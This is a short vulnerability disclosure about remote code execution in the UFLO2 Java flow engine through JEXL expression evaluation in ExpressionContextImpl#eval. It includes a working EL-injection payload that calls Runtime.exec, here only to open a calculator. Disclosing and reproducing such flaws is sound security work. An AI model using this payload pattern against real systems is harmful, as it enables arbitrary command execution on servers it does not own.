UFLO2 RCE
UFLO2 is an efficient flow engine written in Java.
GitHub:
https://github.com/youseries/uflo
Maven:
https://mvnrepository.com/artifact/com.bstek.uflo/uflo-console/2.1.5
https://mvnrepository.com/artifact/com.bstek.uflo/uflo-core/2.1.5
In com.bstek.uflo.expr.impl.ExpressionContextImpl#eval, we can see that EL expressions are executed with jexl2.
Payload:
${"123".Class.forName('java.lang.Runtime').getRuntime().exec(' open -a calculator')}
(Press Enter to save the settings)
The project https://github.com/EvanLeung08/ufloExample can be used to start UFLO2 quickly (you only need to change the version in pom.xml to the correct one).